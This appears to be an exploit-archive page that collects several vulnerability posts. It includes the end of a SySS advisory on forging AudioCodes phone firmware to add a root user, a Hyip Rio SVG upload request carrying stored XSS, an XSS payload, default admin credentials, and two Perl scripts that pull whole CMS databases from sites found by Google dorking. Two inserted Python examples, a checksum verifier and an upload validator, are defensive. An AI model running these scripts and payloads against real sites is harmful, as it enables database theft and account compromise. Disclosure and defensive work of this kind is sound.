bytes "0xBB 0xBB 0xBB 0xBB"<br />followed by a 4-byte section header size field ("0x60 0x00 0x00 x00")<br />and other metadata like length fields and a checksum at the offset<br />0x50. 
This checksum is calculated by adding up all bytes of the section<br />data starting at the section offset 0x60.<br /><br />As a proof of concept, a manipulated firmware image file was created in<br />which an additional user with root privileges was added in the<br />"rootfs.ext4" section. After recalculating the checksum and updating<br />the section header with its checksum, the manipulated firmware image<br />could be successfully uploaded and installed on an AudioCodes IP phone.<br /><br />To automate this task, a simple Python script has been developed to<br />deal with AudioCodes IP phone firmware images.<br /><br />The following output exemplarily shows how a modified firmware image<br />for the AudioCodes IP phone C450HD was updated with correct checksums:<br /><br />#> python3 audiocodes-firmware-tool.py -i AudioCodes_UCC450HD_3.4.6.604.1.img -u<br /><br />AudioCodes Firmware Tool v0.3 by Matthias Deeg - SySS GmbH (c) 2022<br />- ---<br />Image infos<br />===========<br />Hardware: C450HD<br />Software: UC_3.4.6.604.1<br />Version: 25 (0x19)<br />Number of sections: 4<br />Header length: 112 (0x70)<br />Checksum: 0x00000877<br />Calculated checksum: 0x00000877<br />Attribute: 7 (0x00000007)<br />Date: 2021-12-13_09:07:38<br />CE5: 0<br />- ---<br />Section name: bootloader.img<br />Section checksum: 0x0247D1A3<br />Calculated checksum: 0x0247D1A3<br />Data size (8-byte aligned): 423992 (0x67838)<br />Data size : 423992 (0x67838)<br />- ---<br />Section name: rootfs.ext4<br />Section checksum: 0x78EF3E3D<br />Calculated checksum: 0x78EF3E6D<br />Data size (8-byte aligned): 134238208 (0x8005000)<br />Data size : 134238208 (0x8005000)<br />- ---<br />[...]<br /><br />[*] Saved updated firmware image to AudioCodes_UCC450HD_3.4.6.604.1.img.new<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />Not yet fixed.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br 
/><br />Disclosure Timeline:<br /><br />2022-11-10: Vulnerability discovered<br />2022-11-14: Vulnerability reported to manufacturer<br />2022-12-12: Vulnerability confirmed by AudioCodes Ltd.<br />2023-01-19: AudioCodes Ltd. informs that a solution is planned in 2023<br />2023-07-13: AudioCodes Ltd. sets solution date to the end of 2023<br />2023-08-10: Public disclosure at BlackHat USA[4]<br />2023-08-11: Public disclosure at https://blog.syss.com[5]<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] AudioCodes IP Phones Product Website<br /> https://www.audiocodes.com/solutions-products/products/ip-phones<br />[2] SySS Security Advisory SYSS-2022-055<br /> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-055.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy<br />[4] BlackHat USA Briefings Session<br /> https://www.blackhat.com/us-23/briefings/schedule/#zero-touch-pwn-abusing-zooms-zero-touch-provisioning-for-remote-attacks-on-desk-phones-31341<br />[5] Detailed Blog Post<br /> https://blog.syss.com/posts/zero-touch-pwn/<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Matthias Deeg and Moritz Abrell<br />of SySS GmbH.<br /><br />E-Mail: matthias.deeg@syss.de<br />Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Matthias_Deeg.asc<br />Key Fingerprint: D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB<br /><br />E-Mail: moritz.abrell@syss.de<br />Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc<br />Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without 
warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS website.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL:http://creativecommons.org/licenses/by/3.0/deed.en<br /></code></pre>
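<p>The section checksum the advisory describes, as a verifier (added example, not SySS's audiocodes-firmware-tool.py): it makes concrete that the only thing the "flasher" checks is a byte sum, which detects corruption but says nothing about who produced the section, so the missing piece is a signature verified against a key anchored in immutable hardware (the CWE-1326 on the page). Known from the advisory: the BB BB BB BB magic, the 0x60 header-size field, a checksum at header offset 0x50 summing all data bytes from offset 0x60. Assumed, because the page does not say: the checksum is a little-endian uint32, and a section's data runs to the next magic; the sample image is constructed with hand-computed sums.</p>

```python
"""Verify the per-section additive checksums of an AudioCodes-style firmware image.

Added example, not SySS's audiocodes-firmware-tool.py.  Assumed layout details
(little-endian uint32 checksum, data runs to the next magic) are not stated in
the advisory; the sample image is constructed."""
import struct
from dataclasses import dataclass

SECTION_MAGIC = b"\xbb\xbb\xbb\xbb"
HEADER_SIZE = 0x60
CHECKSUM_OFFSET = 0x50


@dataclass
class SectionCheck:
    index: int
    offset: int
    data_len: int
    stored: int
    calculated: int

    @property
    def ok(self):
        return self.stored == self.calculated


def additive_checksum(data):
    """Plain byte sum truncated to 32 bits: an integrity check against
    corruption only; any rebuilt section with the same sum passes."""
    return sum(data) & 0xFFFFFFFF


def find_sections(image):
    """Offsets of every section magic.  Limitation of the assumed layout: magic
    bytes inside section data would be taken for a new section."""
    offsets, pos = [], image.find(SECTION_MAGIC)
    while pos != -1:
        offsets.append(pos)
        pos = image.find(SECTION_MAGIC, pos + HEADER_SIZE)
    return offsets


def verify_sections(image):
    """One SectionCheck per section; compare .stored with .calculated."""
    offsets = find_sections(image)
    checks = []
    for i, start in enumerate(offsets):
        end = offsets[i + 1] if i + 1 < len(offsets) else len(image)
        header = image[start:start + HEADER_SIZE]
        if len(header) < HEADER_SIZE:
            break  # truncated image; nothing sensible left to verify
        stored = struct.unpack_from("<I", header, CHECKSUM_OFFSET)[0]
        data = image[start + HEADER_SIZE:end]
        checks.append(SectionCheck(i, start, len(data), stored, additive_checksum(data)))
    return checks


def _constructed_section(data, stored_checksum):
    """Test fixture: only the header fields the advisory names are populated."""
    hdr = bytearray(HEADER_SIZE)
    hdr[0:4] = SECTION_MAGIC
    hdr[4:8] = struct.pack("<I", HEADER_SIZE)
    hdr[CHECKSUM_OFFSET:CHECKSUM_OFFSET + 4] = struct.pack("<I", stored_checksum)
    return bytes(hdr) + data


# Placeholder 0x70-byte image header (zeros), then two 8-byte sections whose
# checksums were computed by hand: (1+2+3+4)*2 = 20 = 0x14 and 0+1+...+7 = 28 = 0x1C.
SAMPLE_IMAGE = (bytes(0x70)
                + _constructed_section(b"\x01\x02\x03\x04" * 2, 0x14)
                + _constructed_section(bytes(range(8)), 0x1C))
# Flip the last data byte (7 -> 9) without touching the header: sum becomes 30 = 0x1E.
TAMPERED_IMAGE = SAMPLE_IMAGE[:-1] + b"\x09"

if __name__ == "__main__":
    for label, img in (("original", SAMPLE_IMAGE), ("tampered", TAMPERED_IMAGE)):
        for c in verify_sections(img):
            print(f"{label}: section {c.index} @0x{c.offset:x} stored=0x{c.stored:08X} "
                  f"calculated=0x{c.calculated:08X} {'OK' if c.ok else 'MISMATCH'}")
```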
<pre><code># Exploit Title: Hyip Rio 2.1 - Arbitrary File Upload<br /># Exploit Author: CraCkEr<br /># Date: 30/07/2023<br /># Vendor: tdevs<br /># Vendor Homepage: https://tdevs.co/<br /># Software Link: https://hyiprio-feature.tdevs.co/<br /># Tested on: Windows 10 Pro<br /># Impact: Allows User to upload files to the web server<br /># CVE: CVE-2023-4382<br /><br /><br />## Description<br /><br />Allows Attacker to upload malicious files onto the server, such as Stored XSS<br /><br /><br />## Steps to Reproduce:<br /><br />1. Login as a [Normal User]<br />2. In [User Dashboard], go to [Profile Settings] on this Path: https://website/user/settings<br />3. Upload any Image into the [avatar]<br />4. Capture the POST Request with [Burp Proxy Intercept]<br />5. Edit the file extension to .svg & inject your [Evil-Code] or [Stored XSS]<br /> <br />-----------------------------------------------------------<br />POST /user/settings/profile-update HTTP/2<br /><br />Content-Disposition: form-data; name="avatar"; filename="XSS.svg"<br />Content-Type: image/png<br /><br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><br /> <script type="text/javascript"><br /> alert("XSS by Skalvin");<br /> </script><br /></svg><br />-----------------------------------------------------------<br /><br />6. Send the Request<br />7. Capture the GET request from [Burp Logger] to get the Path of your Uploaded [Stored-XSS] or right-click on the Avatar and Copy the Link<br />8. Access your Uploded Evil file on this Path: https://website/assets/global/images/********************.svg<br /><br /><br /><br />[-] Done<br /></code></pre>
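<p>The request in step 5 gets through because the server trusts the client's filename and Content-Type. The Python below is an added example (not code from the write-up or from Hyip Rio; all names are illustrative) of server-side avatar validation that sniffs the type from the bytes, keeps SVG off the avatar allow-list, checks that the declared type and extension agree with the sniffed type, and generates the stored name instead of reusing the client's.</p>

```python
"""Server-side avatar validation that rejects an SVG-with-script upload.

Added example, not from the exploit write-up or from Hyip Rio; names are
illustrative.  The client's filename and Content-Type are never trusted."""
import re
import secrets
from dataclasses import dataclass, field
from typing import Optional

RASTER_SIGNATURES = {
    "png": [b"\x89PNG\r\n\x1a\n"],
    "jpeg": [b"\xff\xd8\xff"],
    "gif": [b"GIF87a", b"GIF89a"],
}
ALLOWED_EXTENSIONS = {"png": {"png"}, "jpeg": {"jpg", "jpeg"}, "gif": {"gif"}}
STORED_EXTENSION = {"png": ".png", "jpeg": ".jpg", "gif": ".gif"}
MIME_TO_KIND = {"image/png": "png", "image/jpeg": "jpeg", "image/gif": "gif"}
SVG_START = re.compile(rb"^\s*(<\?xml|<!DOCTYPE\s+svg|<svg)", re.IGNORECASE)


@dataclass
class UploadDecision:
    accepted: bool
    sniffed_kind: Optional[str]
    stored_name: Optional[str] = None
    reasons: list = field(default_factory=list)


def sniff_kind(data):
    """Classify by magic bytes only; 'svg' covers any XML-looking body."""
    for kind, sigs in RASTER_SIGNATURES.items():
        if any(data.startswith(s) for s in sigs):
            return kind
    if SVG_START.match(data[:256]):
        return "svg"
    return None


def validate_avatar(filename, declared_type, data, max_bytes=2 * 1024 * 1024):
    """Return an UploadDecision; every failed check is listed in .reasons."""
    reasons = []
    kind = sniff_kind(data)
    if len(data) > max_bytes:
        reasons.append("file too large")
    if kind is None:
        reasons.append("content is not a recognised image format")
    elif kind == "svg":
        reasons.append("SVG is XML and can carry <script> or event handlers; "
                       "not accepted for avatars")
    if MIME_TO_KIND.get(declared_type) != kind:
        reasons.append(f"declared Content-Type {declared_type!r} does not match "
                       f"sniffed content {kind!r}")
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if kind in ALLOWED_EXTENSIONS and ext not in ALLOWED_EXTENSIONS[kind]:
        reasons.append(f"extension {ext!r} does not match sniffed content {kind!r}")
    if reasons:
        return UploadDecision(False, kind, None, reasons)
    # Never reuse the client's name; the extension follows the sniffed type.
    # Serve the stored file with X-Content-Type-Options: nosniff.
    return UploadDecision(True, kind, secrets.token_hex(16) + STORED_EXTENSION[kind], [])


# Constructed samples: the body shape from step 5 above, and a minimal PNG prefix.
XSS_SVG = (b'<?xml version="1.0" standalone="no"?>\n'
           b'<svg version="1.1" xmlns="http://www.w3.org/2000/svg">'
           b'<script type="text/javascript">alert("constructed")</script></svg>')
TINY_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\rIHDR" + b"\x00" * 17

if __name__ == "__main__":
    print(validate_avatar("XSS.svg", "image/png", XSS_SVG))
    print(validate_avatar("avatar.png", "image/png", TINY_PNG))
```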
<pre><code>====================================================================================================================================<br />| # Title : ExcessWeb & Network CMS v4.0 Database Disclosure Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 74.0(32-bit) |<br />| # Vendor : http://www.excessweb.co.th/ | <br />| # Dork : Powered by ExcessWeb & Network |<br />====================================================================================================================================<br /><br />poc :<br /><br />[-] Download the database: <br /><br /> The following Perl exploit will attempt to download the (acart.mdb) file.<br /> The (acart.mdb) file is the database and contains all the data.<br /> <br />[+] Dorking in Google or other search engines.<br /><br />[+] save code as perl file : poc.pl<br /><br />[+] code :<br /><br />#!/usr/bin/perl -w<br />#<br /># ExcessWeb & Network CMS v4.0 Database Disclosure Exploit <br />#<br /># Author : indoushka<br />#<br /># Vendor : ToastForums.com<br /> <br /> <br /> <br />use LWP::Simple;<br />use LWP::UserAgent;<br /><br />system('cls');<br />print ('ExcessWeb & Network CMS v4.0 Database Disclosure Exploit');<br />system('color a');<br /><br /><br />if(@ARGV < 2)<br />{<br />print "[-]How To Use\n\n";<br />&help; exit();<br />}<br />sub help()<br />{<br />print "[+] usage1 : perl $0 site.com /path/ \n";<br />print "[+] usage2 : perl $0 localhost / \n";<br />}<br />($TargetIP, $path, $File,) = @ARGV;<br /><br />$File="database/Webdatas.mdb";<br />my $url = "http://" . $TargetIP . $path . $File;<br />print "\n Fuck you wait!!! \n\n";<br /><br />my $useragent = LWP::UserAgent->new();<br />my $request = $useragent->get($url,":content_file" => "D:/acart.mdb");<br /><br />if ($request->is_success)<br />{<br />print "[+] $url Exploited!\n\n";<br />print "[+] Database saved to D:/acart.mdb\n";<br />exit();<br />}<br />else<br />{<br />print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";<br />exit();<br />}<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : evsanati radyo v1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |<br />| # Vendor : https://donanimplus.com/b/evsanati-v1-0-radyo-scripti/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] The application appears to leave default credentials in place after installation.<br /><br />[+] Use Payload : user & pass = admin <br /><br />[+] panel = yonetim<br /><br />[+] http://127.0.0.1/wwwkacikfmcom/yonetim/home.php<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Event Locations CMS v1.0.1 - XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) | <br />| # Vendor : https://codecanyon.net/item/event-locations-phpmysql-plugin/22100679 | <br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] Click to create a "Nouveau RDV" (new appointment) and use the payload : <script>alert(/indoushka/);</script><br /><br />[+] http://127.0.0.1/cutgg/ <br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Erim Upload V4 Database Disclosure Exploit |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) | <br />| # Vendor : https://script.horje.com/view/218412 | <br />====================================================================================================================================<br /><br />poc :<br /><br />[-] Download the database: <br /><br /> The following Perl exploit will attempt to download the (upload/veritabani/erimicel.mdb) file.<br /> The (upload/veritabani/erimicel.mdb) file is the database and contains all the data.<br /> <br />[+] Dorking in Google or other search engines.<br /><br />[+] save code as perl file : poc.pl<br /><br />[+] code :<br /><br />#!/usr/bin/perl -w<br />#<br /># Erim Upload V4 Database Disclosure Exploit <br />#<br /># Author : indoushka<br />#<br /># Vendor : script.horje.com/view/218412<br /> <br /> <br /> <br />use LWP::Simple;<br />use LWP::UserAgent;<br /><br />system('cls');<br />print ('Erim Upload V4 Database Disclosure Exploit');<br />system('color a');<br /><br /><br />if(@ARGV < 2)<br />{<br />print "[-]How To Use\n\n";<br />&help; exit();<br />}<br />sub help()<br />{<br />print "[+] usage1 : perl $0 site.com /path/ \n";<br />print "[+] usage2 : perl $0 localhost / \n";<br />}<br />($TargetIP, $path, $File,) = @ARGV;<br /><br />$File="upload/veritabani/erimicel.mdb";<br />my $url = "http://" . $TargetIP . $path . $File;<br />print "\n Fuck you wait!!! \n\n";<br /><br />my $useragent = LWP::UserAgent->new();<br />my $request = $useragent->get($url,":content_file" => "D:/erimicel.mdb");<br /><br />if ($request->is_success)<br />{<br />print "[+] $url Exploited!\n\n";<br />print "[+] Database saved to D:/erimicel.mdb\n";<br />exit();<br />}<br />else<br />{<br />print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";<br />exit();<br />}<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br />=======================================================================================================================================<br /></code></pre>